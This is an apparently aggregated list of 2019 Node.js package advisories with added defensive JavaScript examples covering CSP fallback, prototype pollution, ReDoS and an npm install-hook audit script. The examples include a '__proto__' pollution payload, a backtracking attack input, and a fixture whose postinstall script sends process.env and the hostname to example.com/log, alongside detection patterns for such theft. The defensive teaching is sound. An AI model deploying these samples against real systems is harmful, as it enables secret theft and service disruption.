1293 matches found

Node.js · added 2019/09/20 11:03 p.m. · 9 views

Configuration Override

Overview: Versions of helmet-csp before 2.9.1 are vulnerable to a Configuration Override affecting the application's Content Security Policy (CSP). The package's browser sniffing for Firefox deletes the default-src directive, which is the fallback for every fetch directive the policy does not set explicitly. This allows an attacker to remove an...

AI score 6.7 · Exploits 0 · Affected software 1
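To make the fallback point concrete, here is an added example (not helmet-csp's own code) that models how a browser resolves CSP fetch directives against default-src and what changes when default-src is dropped from an otherwise intact policy. The policy header string and the origins in it are constructed for the example.

```javascript
// Added example (not helmet-csp's own code): a small model of how a browser
// resolves CSP fetch directives against default-src, to show what is lost when
// the default-src directive is dropped from an otherwise intact policy.
// The policy string below is constructed for the example.

// Parse "name src src; name src" into a Map of directive -> source list.
function parseCsp(header) {
  const policy = new Map();
  for (const raw of header.split(';')) {
    const parts = raw.trim().split(/\s+/).filter(Boolean);
    if (parts.length === 0) continue;
    const [name, ...sources] = parts;
    policy.set(name.toLowerCase(), sources);
  }
  return policy;
}

// Fetch directives (script-src, img-src, connect-src, ...) fall back to
// default-src when absent. With neither present the browser applies no
// restriction at all, which this model represents as null.
// Note: document directives such as base-uri and frame-ancestors do not fall
// back to default-src; this model only covers the fetch directives.
function effectiveSources(policy, directive) {
  if (policy.has(directive)) return policy.get(directive);
  if (policy.has('default-src')) return policy.get('default-src');
  return null;
}

// Simplified source matching: exact origin match or the '*' wildcard.
// Real CSP matching also handles 'self', schemes, host wildcards and nonces.
function allows(policy, directive, origin) {
  const sources = effectiveSources(policy, directive);
  if (sources === null) return true;
  return sources.includes('*') || sources.includes(origin);
}

// The bug class from the advisory: a middleware that, on some code path,
// deletes default-src before serialising the header.
function dropDefaultSrc(policy) {
  const copy = new Map(policy);
  copy.delete('default-src');
  return copy;
}

// Serialise back to a header so the difference is visible in the wire format.
function serialize(policy) {
  return [...policy].map(([name, sources]) => [name, ...sources].join(' ')).join('; ');
}

// Constructed policy: scripts only from the app origin and one CDN, everything
// else locked to the app origin via default-src.
const APP = 'https://app.example.com';
const HEADER = `default-src ${APP}; script-src ${APP} https://cdn.example.com`;

// Same request evaluated against the intact and the damaged policy.
function compare(directive, origin) {
  const intact = parseCsp(HEADER);
  const broken = dropDefaultSrc(intact);
  return {
    intact: allows(intact, directive, origin),
    broken: allows(broken, directive, origin),
  };
}

// Example: compare('connect-src', 'https://evil.example')
// -> { intact: false, broken: true }: with default-src gone, a directive the
// policy never named is no longer governed by anything.
```

The explicit script-src survives the deletion, so the damage is confined to the directives the application relied on default-src to cover (connect-src, img-src, font-src and so on); that is why the bug is a silent widening rather than an obvious breakage.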
Node.js · added 2019/09/17 8:02 p.m. · 11 views

Path Traversal

Overview: All versions of @wturyn/swagger-injector are vulnerable to Path Traversal. The package fails to sanitize URLs, allowing attackers to access server files outside of the configured dist folder using relative paths. Recommendation: No fix is currently available. Consider using an alternative...

AI score 6.8 · Exploits 0 · Affected software 1
Node.js · added 2019/09/17 7:03 p.m. · 11 views

Path Traversal

Overview: All versions of swagger-injector are vulnerable to Path Traversal. The package fails to sanitize URLs, allowing attackers to access server files outside of the configured dist folder using relative paths. Recommendation: No fix is currently available. Consider using an alternative package...

AI score 6.8 · Exploits 0 · Affected software 1
Node.js · added 2019/09/16 10:28 p.m. · 13 views

Cross-Site Scripting

Overview: All versions of mavon-editor are vulnerable to Cross-Site Scripting. The package fails to sanitize entered input, allowing attackers to execute arbitrary JavaScript in a victim's browser. Recommendation: No fix is currently available. Consider using an alternative package until a fix is...

AI score 7.3 · Exploits 0 · Affected software 1
Node.js · added 2019/09/16 6:01 p.m. · 12 views

Cross-Site Scripting

Overview: All versions of snekserve are vulnerable to Cross-Site Scripting (XSS). The package fails to sanitize filenames, allowing attackers to execute arbitrary JavaScript in the victim's browser through files whose names contain malicious code. Recommendation: No fix is currently available...

AI score 6.7 · Exploits 0 · Affected software 1
Node.js · added 2019/09/16 3:14 p.m. · 42 views

Prototype Pollution

Overview: Versions of handlebars prior to 3.0.8 or 4.3.0 are vulnerable to Prototype Pollution leading to Remote Code Execution. Templates may alter an Object's __proto__ and __defineGetter__ properties, which may allow an attacker to execute arbitrary code through crafted payloads. Recommendation: Upgrade...

CVSS 7.5 · AI score 9.8 · EPSS 0.24752 · Exploits 0 · Affected software 1
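The advisory names the mechanism (template access to __proto__ and __defineGetter__) but not the general bug class, so here is an added example that is not Handlebars code: the generic form of prototype pollution, a recursive merge of untrusted JSON, first written naively and then with the checks that close it. The chain from a polluted prototype to code execution inside Handlebars goes through the template engine and is not reproduced here; the example stops at the point where every object in the process has acquired an attacker-chosen property. The JSON payload is constructed for the example.

```javascript
// Added example, not Handlebars code: generic prototype pollution through a
// recursive merge of untrusted JSON, the naive version next to a hardened one.
// The payload below is constructed for the example.

function unsafeMerge(target, source) {
  for (const key of Object.keys(source)) {
    const value = source[key];
    if (value !== null && typeof value === 'object') {
      // When key is "__proto__", target[key] resolves to Object.prototype, so
      // the recursion writes the attacker's keys onto every object in the process.
      if (target[key] === null || typeof target[key] !== 'object') target[key] = {};
      unsafeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Keys that lead out of the object and into the prototype chain.
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (FORBIDDEN_KEYS.has(key)) continue; // never walk into the prototype chain
    const value = source[key];
    if (value !== null && typeof value === 'object') {
      // Descend only into the target's own properties, and create children
      // without a prototype so there is nothing to pollute further down.
      const own = Object.prototype.hasOwnProperty.call(target, key);
      if (!own || target[key] === null || typeof target[key] !== 'object') {
        target[key] = Object.create(null);
      }
      safeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// JSON.parse creates an own property literally named "__proto__", which is
// what lets the payload through Object.keys() in the first place.
const PAYLOAD = '{"__proto__": {"isAdmin": true}}';

// Returns whether Object.prototype acquired `key` after merging the payload
// into an empty object, then removes it so later code starts clean.
function pollutes(merge, payloadJson, key) {
  merge({}, JSON.parse(payloadJson));
  const seen = Object.prototype.hasOwnProperty.call(Object.prototype, key);
  delete Object.prototype[key];
  return seen;
}

// Example: pollutes(unsafeMerge, PAYLOAD, 'isAdmin') -> true
//          pollutes(safeMerge, PAYLOAD, 'isAdmin')   -> false
```

The consequence of the `true` case is that an unrelated `if (user.isAdmin)` check elsewhere in the process now passes for every user object; a template engine that can reach `__defineGetter__` or `constructor` from the same position gets to run code rather than just set a flag, which is why the advisory carries an RCE rating.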
Node.js · added 2019/09/11 4:51 p.m. · 11 views

Regular Expression Denial of Service

Overview: All versions of sql-injection are vulnerable to Regular Expression Denial of Service. The package processes a request's body with regular expressions that may take exponentially longer to execute for large inputs. Recommendation: No fix is currently available. Consider using an alternativ...

AI score 7.2 · Exploits 0 · Affected software 1
Node.js · added 2019/09/06 9:02 p.m. · 17 views

Malicious Package

Overview: All versions of evil-package contain malicious code. The package uploads the contents of process.env to example.com/log. Recommendation: Remove the package from your environment. Given the host the information was uploaded to, there is no further indication of compromise. References...

AI score 6.6 · Exploits 0 · Affected software 1
Node.js · added 2019/09/06 7:50 p.m. · 20 views

Message Signature Bypass

Overview: Versions of openpgp prior to 4.2.0 are vulnerable to Message Signature Bypass. The package fails to verify that a message signature is of type text. This allows an attacker to construct a message with a signature type that only verifies subpackets without additional input such as...

CVSS 5 · AI score 1.7 · EPSS 0.00362 · Exploits 1 · Affected software 1
Node.js · added 2019/09/06 6:23 p.m. · 10 views

Unintended Require

Overview: All versions of larvitbase-www are vulnerable to an Unintended Require. The package exposes an API endpoint and passes a GET parameter unsanitized to a require call. This allows attackers to execute any .js file in the same folder the server is running from. Recommendation: No fix is...

AI score 7.1 · Exploits 0 · Affected software 1
Node.js · added 2019/09/05 10:28 p.m. · 13 views

Cross-Site Scripting

Overview: Versions of status-board prior to 10.0.1 are vulnerable to Cross-Site Scripting. The createPreviewButton function fails to sanitize the href attribute of the tag it creates. This may allow attackers to execute arbitrary JavaScript in a victim's browser. Recommendation: Upgrade to version 10.0....

CVSS 4.3 · AI score 4.2 · EPSS 0.00308 · Exploits 0 · Affected software 1
Node.js · added 2019/09/05 9:26 p.m. · 14 views

Cross-Site Scripting

Overview: Versions of cyberchef prior to 8.31.3 are vulnerable to Cross-Site Scripting. In Text Encoding Brute Force the table rows are created by concatenating the value variable unsanitized into the HTML. If this variable is controlled by user input it allows attackers to execute arbitrary...

CVSS 4.3 · AI score 3.9 · EPSS 0.00458 · Exploits 1 · Affected software 1
Node.js · added 2019/09/05 8:52 p.m. · 10 views

Regular Expression Denial of Service

Overview: Versions of simple-markdown prior to 0.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS). The SimpleMarkdown.defaultInlineParse function has significantly degraded performance when parsing inline code blocks. Recommendation: Upgrade to version 0.5.2 or later. References: -...

AI score 7.1 · Exploits 0 · Affected software 1
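Neither the sql-injection nor the simple-markdown entry shows the affected regex, so here is an added example (not code from either package) of the regex shape behind most ReDoS reports: a nested quantifier that lets the engine split one run of characters in exponentially many ways, next to an equivalent rewrite that matches in linear time, and the input-size cap a body parser needs regardless of which regex it uses. The patterns and sample inputs are constructed for the example.

```javascript
// Added example, not code from sql-injection or simple-markdown: a
// catastrophic-backtracking pattern, its linear-time equivalent, and an input
// cap. Patterns and inputs are constructed for the example.

// Vulnerable: (\w+\s?)+ can consume "aaaa" as a|aaa, aa|aa, a|a|aa, ... and on
// a trailing "!" the engine retries every split before giving up.
const VULNERABLE = /^(\w+\s?)+$/;

// Same language, one quantifier per position, no overlapping choices: words
// separated by single whitespace, with optional trailing whitespace.
const SAFE = /^\w+(?:\s\w+)*\s?$/;

// Every body parser should bound input before it reaches any regex.
const MAX_BODY_BYTES = 64 * 1024;

function validateBody(body, pattern = SAFE) {
  if (typeof body !== 'string') return { ok: false, reason: 'body is not a string' };
  if (Buffer.byteLength(body, 'utf8') > MAX_BODY_BYTES) return { ok: false, reason: 'body too large' };
  return pattern.test(body) ? { ok: true, reason: 'matched' } : { ok: false, reason: 'rejected' };
}

// Checks that the rewrite accepts and rejects exactly what the original does
// on a corpus of short inputs (where the original is still fast).
function sameDecisions(inputs) {
  return inputs.every((s) => VULNERABLE.test(s) === SAFE.test(s));
}

// Attack input: a run of word characters that can never match because of the
// final "!". For VULNERABLE the cost roughly doubles per extra character.
function attackInput(n) {
  return 'a'.repeat(n) + '!';
}

// Wall-clock cost of one test() call in milliseconds.
function timeMatch(pattern, input) {
  const start = process.hrtime.bigint();
  pattern.test(input);
  return Number(process.hrtime.bigint() - start) / 1e6;
}

// Demo only (not run by the checks below): timings for n = 18..24. Expect
// milliseconds growing towards seconds for VULNERABLE, microseconds for SAFE.
function demo() {
  const rows = [];
  for (let n = 18; n <= 24; n += 2) {
    const input = attackInput(n);
    rows.push({ n, vulnerableMs: timeMatch(VULNERABLE, input), safeMs: timeMatch(SAFE, input) });
  }
  return rows;
}
```

The rewrite works because at every position exactly one branch of the pattern can consume the next character, so there is nothing to backtrack into; the length cap is still needed because a linear-time regex over an unbounded body is still a CPU budget the client controls.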
Node.js · added 2019/09/04 3:40 p.m. · 8 views

Path Traversal

Overview: All versions of public are vulnerable to Path Traversal. This vulnerability allows an attacker to access files outside the webroot, because symlinks reached through the URL are followed without checking where they point. Recommendation: No fix is currently available. Do not use public in production or consider using an alternative...

AI score 6.7 · Exploits 0 · Affected software 1
Node.js · added 2019/08/30 7:55 p.m. · 12 views

Malicious Package

Overview: This package contained malicious code. The package uploaded system information such as OS and hostname to a remote server. Recommendation: Remove the package from your environment. There are no indications of further compromise. References: GitHub Advisory...

AI score 6.7 · Exploits 0 · Affected software 1
Node.js · added 2019/08/30 7:55 p.m. · 7 views

Malicious Package

Overview: This package contained malicious code. The package uploaded system information such as OS and hostname to a remote server. Recommendation: Remove the package from your environment. There are no indications of further compromise. References: GitHub Advisory...

AI score 6.7 · Exploits 0 · Affected software 1
Node.js · added 2019/08/30 7:55 p.m. · 10 views

Malicious Package

Overview: This package contained malicious code. The package uploaded system information such as OS and hostname to a remote server. Recommendation: Remove the package from your environment. There are no indications of further compromise. References: GitHub Advisory...

AI score 6.7 · Exploits 0 · Affected software 1
Node.js · added 2019/08/30 7:55 p.m. · 13 views

Malicious Package

Overview: This package contained malicious code. The package uploaded system information such as OS and hostname to a remote server. Recommendation: Remove the package from your environment. There are no indications of further compromise. References: GitHub Advisory...

AI score 6.7 · Exploits 0 · Affected software 1
Node.js · added 2019/08/30 7:55 p.m. · 8 views

Malicious Package

Overview: This package contained malicious code. The package uploaded system information such as OS and hostname to a remote server. Recommendation: Remove the package from your environment. There are no indications of further compromise. References: GitHub Advisory...

AI score 6.7 · Exploits 0 · Affected software 1
Node.js · added 2019/08/30 7:55 p.m. · 13 views

Malicious Package

Overview: This package contained malicious code. The package uploaded system information such as OS and hostname to a remote server. Recommendation: Remove the package from your environment. There are no indications of further compromise. References: GitHub Advisory...

AI score 6.7 · Exploits 0 · Affected software 1
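The evil-package entry (process.env uploaded to a remote host) and the six entries above (OS and hostname uploaded to a remote server) describe the same two behaviours: code that runs at install time, and code that reads environment or host identity and has a network path to send it somewhere. Here is an added example, not code from any of those packages and not a detector the advisories describe, of a triage pass a reviewer can run over a dependency tree for exactly those two signals. The two package fixtures (one benign, one modelled on the evil-package description) are constructed for the example, and the signal list is a heuristic for prioritising manual review, not a signature.

```javascript
// Added example: install-time hook and exfiltration-pattern triage for npm
// packages. Fixtures are constructed; the signals are heuristics, not signatures.

// npm runs these hooks automatically during `npm install`.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

const SIGNALS = [
  { id: 'reads-env', re: /\bprocess\.env\b/ },
  { id: 'reads-host-identity', re: /\bos\.(hostname|userInfo|networkInterfaces|platform|release)\s*\(/ },
  { id: 'network', re: /\brequire\(\s*['"](https?|dns|net|tls)['"]\s*\)|\bfetch\s*\(/ },
];

// pkg: the parsed package.json; files: { relativePath: sourceText }.
// A file is flagged only when it both collects something and can send it.
function auditPackage(pkg, files) {
  const findings = [];
  const scripts = pkg.scripts || {};
  for (const hook of LIFECYCLE_HOOKS) {
    if (scripts[hook]) findings.push({ kind: 'lifecycle-hook', detail: `${hook}: ${scripts[hook]}` });
  }
  for (const [file, text] of Object.entries(files)) {
    const hits = SIGNALS.filter((s) => s.re.test(text)).map((s) => s.id);
    const collects = hits.includes('reads-env') || hits.includes('reads-host-identity');
    if (collects && hits.includes('network')) {
      findings.push({ kind: 'possible-exfiltration', detail: `${file}: ${hits.join(', ')}` });
    }
  }
  return findings;
}

// Constructed fixtures.
const BENIGN = {
  pkg: { name: 'left-padder', version: '1.0.0', scripts: { test: 'node test.js' } },
  files: { 'index.js': 'module.exports = (s, n) => String(s).padStart(n);\n' },
};

const SUSPECT = {
  pkg: { name: 'evil-package', version: '1.0.0', scripts: { postinstall: 'node collect.js' } },
  files: {
    'index.js': "module.exports = () => 'hello';\n",
    'collect.js': [
      "const https = require('https');",
      "const os = require('os');",
      'const body = JSON.stringify({ env: process.env, host: os.hostname() });',
      "const req = https.request({ host: 'example.com', path: '/log', method: 'POST' });",
      'req.end(body);',
    ].join('\n'),
  },
};

function summarize(fixture) {
  const findings = auditPackage(fixture.pkg, fixture.files);
  return { name: fixture.pkg.name, findings, flagged: findings.length > 0 };
}

// Example: summarize(SUSPECT).findings ->
//   [ { kind: 'lifecycle-hook', detail: 'postinstall: node collect.js' },
//     { kind: 'possible-exfiltration', detail: 'collect.js: reads-env, reads-host-identity, network' } ]
```

Two operational notes go with this. First, the lifecycle-hook finding is the one that matters most, because it runs before any application code and before a reviewer has looked at anything; `npm ci --ignore-scripts` (or `npm config set ignore-scripts true`) removes that window at the cost of breaking packages that legitimately build on install. Second, the advisories' own recommendation applies once a hit is confirmed: remove the package, and treat every value that was in process.env on the affected hosts as exposed, which for most CI runners means rotating tokens.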